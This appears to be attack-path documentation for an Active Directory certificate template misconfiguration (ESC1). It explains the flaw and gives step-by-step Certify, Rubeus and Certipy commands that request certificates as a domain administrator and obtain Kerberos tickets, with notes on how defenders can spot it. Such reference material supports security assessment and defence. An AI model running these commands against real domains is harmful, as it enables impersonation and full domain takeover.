This edge indicates that the principal has permission to enroll on one or more certificate templates, allowing them to specify an alternate subject name and use the certificate for authentication. They also have enrollment permission for an enterprise CA with the necessary templates published. This enterprise CA is trusted for NT authentication in the forest, along with the certificate chain up to the root CA certificate. This setup lets the principal enroll certificates for any AD forest user or computer, enabling authentication and impersonation of any AD forest user or computer without their credentials.
Abuse Info
Windows
Step 1: Use Certify to request enrollment in the affected template, specifying the affected
certification authority and target principal to impersonate:
Certify.exe request /ca:rootdomaindc.forestroot.com\forestroot-RootDomainDC-CA /template:"ESC1" /altname:ForestRootDA /sid:S-1-5-21-2697957641-2271029196-387917394-500
Step 2: Convert the emitted certificate to PFX format:
certutil.exe -MergePFX .\cert.pem .\cert.pfx
Step 3: Optionally purge all Kerberos tickets from memory:
klist purge
Step 4: Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the
target identity to impersonate and the PFX-formatted certificate created in Step 2:
Rubeus asktgt /user:forestrootda /domain:forestroot.com /certificate:cert.pfx /password:asdf /ptt
Linux
Step 1: Use Certipy to request enrollment in the affected template, specifying the target
enterprise CA and target principal to impersonate:
certipy req -u john@corp.local -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC1 -upn administrator@corp.local
Step 2: Request a ticket granting ticket (TGT) from the domain, specifying the certificate
created in Step 1 and the IP of a domain controller:
certipy auth -pfx administrator.pfx -dc-ip 172.16.12
Opsec Considerations
When the affected certificate authority issues the certificate to the attacker, it will retain a local copyof that certificate in its issued certificates store. Defenders may analyze those issued certificates to
identify illegitimately issued certificates and identify the principal that requested the certificate, as
well as the target identity the attacker is attempting to impersonate.
References
This edge is related to the following MITRE ATT&CK tactic and techniques:
- https://attack.mitre.org/techniques/T1649/
Abuse and Opsec references
- Certipy
- Rubeus
- https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf
- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#misconfigured-certificate-templates-esc1
- https://hideandsec.sh/books/cheatsheets-82c/page/active-directory-certificate-ser
Updated